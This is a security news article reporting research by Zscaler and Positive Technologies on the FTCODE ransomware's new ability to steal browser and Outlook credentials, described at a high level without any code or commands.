Revamped Malware Targets Browsers and Email Clients
FTCODE, a ransomware strain that has been active since at least 2013, has recently been revamped to include new features, including the ability to steal credentials and passwords from web browsers and email clients, according to two research reports released this week.
Although the ransomware originally targeted Russian-speaking victims when it first appeared seven years ago, it’s now spread to other countries. In new samples found by Positive Technologies researchers, FTCODE and its updated capabilities were zeroing in on victims in Italy and elsewhere.
When examining these new ransomware samples, analysts found that FTCODE had recently been updated to steal credentials and passwords from popular browsers, including Microsoft Internet Explorer, Mozilla Firefox and Google Chrome, according to an analysis by Zscaler ThreatLabZ researchers Rajdeepsinh Dodia, Amandeep Kumar and Atinderpal Singh. The ransomware also has the ability to swipe passwords from Microsoft Outlook.
It’s not clear how many victims have been hit with this ransomware strain, but its ability to encrypt files, as well steal credentials and passwords, has security analysts watching FTCODE more closely.
“The FTCODE ransomware campaign is rapidly changing,” the Zscaler analysis states. “Due to the scripting language it was written in, it offers multiple advantages to threat actors, enabling them to easily add or remove features or make tweaks much more easily than is possible with traditionally compiled malware.”
Starts With PowerShell
When Sophos researchers first spotted FTCODE in 2013, they determined the creators of the ransomware used PowerShell to help develop the crypto-locking malware because the scripting language allows for malicious code to run on an infected device without having to save it to a file within Windows.
FTCODE’s code works in a similar fashion to other types of ransomware. In many cases, victims are sent spam emails that contain a malicious attachment with macros, according to Positive Technologies. If someone clicks the link, the macros begin downloading the ransomware code to the targeted device, according to the reports.
In the more recent cases, the Zscaler analysts found that the malware is now being downloaded through VBScript, but the FTCODE is still based on PowerShell. The malicious code is now hidden in a JPEG images to help better disguise it.
Once the FTCODE ransomware is downloaded, it conducts basic recognizance of the infected device and connects with a command-and-control server and awaits instructions, according to Positive Technologies. The malware has the ability to encrypt a wide variety of files, including “.doc,” “.sql,” “*.xls” and several others, according to the report.
Encrypted files are locked with a base64 algorithm. The stolen credentials and passwords can be sent back to the attackers through a HTTP POST request, according to the research reports.
Once a device is infected with the FTCODE ransomware, the attackers send a note demanding payment through an anonymous Tor site, according to Positive Technologies.
FTCODE ransom note (Source: Zscaler)
The attackers using FTCODE typically demand an initial ransom of $500 typically paid in cryptocurrency, but the price steadily goes up the longer the victims don’t pay it, according to Positive Technologies.
Positive Technologies researchers found that FTCODE installs a Trojan called JasperLoader, which can then download other malware, such as a separate banking Trojan, to an infected device.
In the last several months, researchers have noticed criminal gangs exfiltrating data from ransomware victims in an effort to encourage the victims to meet the ransom demands.
In one example from October, the Maze ransomware gang dumped almost 700 MB of data that it had stolen from Allied Universal, a California-based security services firm, and the group has threatened to do it again (see: Alarming Trend: More Ransomware Gangs Exfiltrating Data).